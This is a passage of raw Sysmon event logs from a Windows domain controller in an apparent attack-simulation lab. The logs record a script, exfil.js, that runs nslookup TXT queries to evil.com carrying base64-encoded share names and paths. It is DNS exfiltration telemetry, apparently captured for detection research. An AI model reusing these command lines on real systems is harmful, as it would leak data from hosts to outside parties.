354300x8000000000000000206620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.836{00000000-0000-0000-0000-000000000000}6160<unknown process>-udptruefalse127.0.0.1-50453-false127.0.0.1-53domain 354300x8000000000000000206619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.836{00000000-0000-0000-0000-000000000000}6160<unknown process>-udpfalsefalse127.0.0.1-50452-false127.0.0.1-53domain 354300x8000000000000000206618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.836{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50452- 354300x8000000000000000206617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.836{00000000-0000-0000-0000-000000000000}6160<unknown process>-udptruefalse127.0.0.1-50452-false127.0.0.1-53domain 354300x8000000000000000206616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.836{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50451- 354300x8000000000000000206615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.836{00000000-0000-0000-0000-000000000000}6160<unknown process>-udptruefalse127.0.0.1-50451-false127.0.0.1-53domain 23542300x8000000000000000206614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.471{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlboxp.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.434{2E1864BB-18E5-629A-B342-000000005F02}7564660C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-B442-000000005F02}2928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.434{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.434{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.434{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.434{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.434{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-B442-000000005F02}2928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.434{2E1864BB-18E5-629A-B242-000000005F02}4202200C:\Windows\system32\cmd.exe{2E1864BB-18E5-629A-B442-000000005F02}2928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.443{2E1864BB-18E5-629A-B442-000000005F02}2928C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-B242-000000005F02}420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlboxp.tmp 2>&1 10341000x8000000000000000206605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.418{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-B342-000000005F02}7564C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.418{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-B342-000000005F02}7564C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.418{2E1864BB-18E5-629A-B342-000000005F02}7564660C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-B242-000000005F02}420C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.402{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-B342-000000005F02}7564C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.402{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.402{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.402{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.402{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.402{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-B242-000000005F02}420C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.387{2E1864BB-18E0-629A-6742-000000005F02}39762600C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-B242-000000005F02}420C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.402{2E1864BB-18E5-629A-B242-000000005F02}420C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlboxp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.387{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltcg.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.371{2E1864BB-18E5-629A-B042-000000005F02}79926496C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-B142-000000005F02}7296C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.371{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.371{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.371{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.371{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-B142-000000005F02}7296C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.371{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.371{2E1864BB-18E5-629A-AF42-000000005F02}71922620C:\Windows\system32\cmd.exe{2E1864BB-18E5-629A-B142-000000005F02}7296C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.372{2E1864BB-18E5-629A-B142-000000005F02}7296C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-AF42-000000005F02}7192C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltcg.tmp 2>&1 10341000x8000000000000000206585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.349{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-B042-000000005F02}7992C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 